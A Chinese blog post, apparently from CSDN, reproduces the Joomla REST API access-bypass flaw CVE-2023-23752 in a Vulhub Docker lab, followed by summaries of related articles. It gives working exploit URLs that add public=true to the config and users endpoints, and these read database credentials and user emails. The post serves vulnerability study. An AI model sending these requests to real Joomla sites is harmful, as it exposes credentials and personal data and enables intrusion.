【漏洞复现】CVE-2023-23752 Joomla权限绕过漏洞

于 2023-07-16 12:27:05 发布
阅读量318 收藏 1
点赞数
分类专栏: Vulhub漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53121608/article/details/131749051
版权

环境搭建

sudo docker-compose up -d

查看端口号

sudo docker ps

 服务启动后,访问http://your-ip:8080即可查看到Joomla页面

 这个漏洞是由于错误的属性覆盖导致的,攻击者可以通过在访问Rest API时传入参数public=true来绕过权限校验。比如,访问下面这个链接即可读取所有配置项,包括数据库连接用户名和密码:

http://your-ip:8080/api/index.php/v1/config/application?public=true

 如果不添加public=true,则访问会被拒绝:

 访问下面这个链接即可读取所有用户信息,包含邮箱等:

http://your-ip:8080/api/index.php/v1/users?public=true

 

Knight_Linker
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
漏洞复现Joomla授权访问漏洞(CVE-2023-23752)
做自己喜欢的事,并将其发挥到极致!
05-05 1056
Joomla是一套全球知名的内容管理系统(CMS),其使用PHP语言加上MySQL数据库所开发,可以在Linux、Windows、MacOSX等各种不同的平台上运行。在 Joomla! 版本为4.0.0 到 4.2.7中发现了一个漏洞,由于对web 服务端点访问限制不当,可能导致授权访问Rest API,造成敏感信息泄露(如数据库账号密码等)。远程攻击者可以绕过安全限制获得Web应用程序敏感信息。
CVE-2023-23752Joomla授权访问漏洞复现
薛定谔嘚喵博客
09-01 1520
Joomla是一个免费的开源内容管理系统(CMS),允许用户构建网站和在线应用程序。它于 2005 年首次发布,此后成为最受欢迎的 CMS 平台之一,为全球数百万个网站提供支持。 在 Joomla! 4.0.0 到 4.2.7 中发现了一个问题。不正确地访问检查允许对 Web 服务终结点进行授权访问
Joomla授权访问漏洞|CVE-2023-23752复现及修复
szgyunyun的博客
03-16 2607
Joomla 4.0.0 至 4.2.7 版本中的 ApiRouter.php#parseApiRoute 在处理用户的 Get 请求时对请求参数有效过滤,导致攻击者可向 Joomla 服务端点发送包含 public=true 参数的请求(如:/api/index.php/v1/config/application?本公众号的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
Joomla授权访问漏洞(CVE-2023-23752)
蚁景网安学院
02-24 1070
Joomla! 版本为4.0.0 到 4.2.7中发现了一个漏洞,在Joomla受影响的版本中由于对Web服务端点的访问限制不当,远程攻击者可以绕过安全限制获得Web应用程序敏感信息。
[ 漏洞复现篇 ] Joomla授权访问Rest API漏洞(CVE-2023-23752)
qq_51577576的博客
03-21 3242
[ 漏洞复现篇 ] Joomla授权访问Rest API漏洞(CVE-2023-23752)
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
cve-2023-23752扫描poc
04-24
joomla授权访问cve-2023-23752扫描poc: Joomla是一套全球知名的内容管理系统(CMS),其使用PHP语言加上MySQL数据库所开发,可以在Linux、Windows、MacOSX等各种不同的平台上运行。 2月16日,Joomla官方发布安全...
vulhub漏洞复现 CVE-2016-3088
03-14
vulhub漏洞复现 CVE-2016-3088
CVE-2023-23752 Joomla授权访问漏洞分析
murphysec的博客
02-23 1596
Joomla 在海外使用较多,是一套使用 PHP 和 MySQL 开发的开源、跨平台的内容管理系统(CMS)。 Joomla 4.0.0 至 4.2.7 版本中的 ApiRouter.php#parseApiRoute 在处理用户的 Get 请求时对请求参数有效过滤,导致攻击者可向 Joomla 服务端点发送包含 public=true 参数的请求(如:/api/index.php/v1/config/application?public=true&key=value) 进行授权访问
Joomla Rest API 授权访问漏洞CVE-2023-23752)POC、漏洞复现
wfzshi666的博客
02-22 543
CVE-2023-23752漏洞复现
Joomla存在授权访问漏洞CVE-2023-23752
holyxp的博客
06-27 563
Joomla是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。
Joomla授权访问漏洞CVE-2023-23752
dahege666的博客
03-23 2998
漏洞复现
Joomla权限绕过漏洞CVE-2023-23752)vulhub漏洞复现
qq_53003652的博客
07-07 730
Joomla是一个开源免费的内容管理系统(CMS),基于PHP开发。在其4.0.0版本到4.2.7版本中,存在一处属性覆盖漏洞,导致攻击者可以通过恶意请求绕过权限检查,访问任意Rest API。可获取网站最重要的配置信息,包含数据库的账号与密码。即可看到joomla页面。可获取所有用户的信息。
Joomla漏洞
热门推荐
Grey的博客
07-09 1万+
开始复现漏洞
Joomla远程代码执行漏洞分析
stonesharp的专栏
12-19 4091
说一下这个漏洞的影响和触发、利用方法。这个漏洞影响Joomla 1.5 to 3.4全版本,并且利用漏洞无需登录,只需要发送两次数据包即可(第一次:将session插入数据库中,第二次发送同样的数据包来取出session、触发漏洞、执行任意代码),后果是直接导致任意代码执行。 0x00 漏洞点 —— 反序列化session 这个漏洞存在于反序列化session的过程中。 漏洞
Joomla授权漏洞分析
一剑开天门!的博客
02-23 1485
Joomla授权漏洞分析
CVE-2023-24055漏洞复现
Fiverya的博客
02-01 2578
CVE-2023-24055漏洞复现。​ KeePass采用本地数据库的方式保存用户密码,并允许用户通过主密码对数据库加密。 网络攻击者能够利用漏洞在用户毫不知情的情况下,以纯文本形式导出用户的整个密码数据库。
OpenSSH 安全漏洞(CVE-2023-51767)
最新发布
06-13
CVE-2023-51767是针对OpenSSH (Open Source Secure Shell)的一个已公开的安全漏洞。OpenSSH是一个广泛使用的远程登录工具,允许用户通过网络安全地进行命令交互和文件传输。这个漏洞被标记为严重级别,因为它涉及到SSH协议的认证部分,可能被恶意攻击者利用来进行授权访问。 具体来说,CVE-2023-51767涉及OpenSSH服务器中处理键盘交互式请求的代码。攻击者可能会构造特殊的键盘交互请求,诱使用户输入敏感信息,从而绕过正常的认证流程或获取用户的凭据。由于该漏洞影响了SSH的核心功能,因此它可能在打补丁的服务器上造成广泛的影响。 为了保护系统免受此漏洞的侵害,建议所有使用OpenSSH的组织尽快更新到最新版本,修复该漏洞。官方会提供相应的安全公告和补丁下载,确保服务器的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值